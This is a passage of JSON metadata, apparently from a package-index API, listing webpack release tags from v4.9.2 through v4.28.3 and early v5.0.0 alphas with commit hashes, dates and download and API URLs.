webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2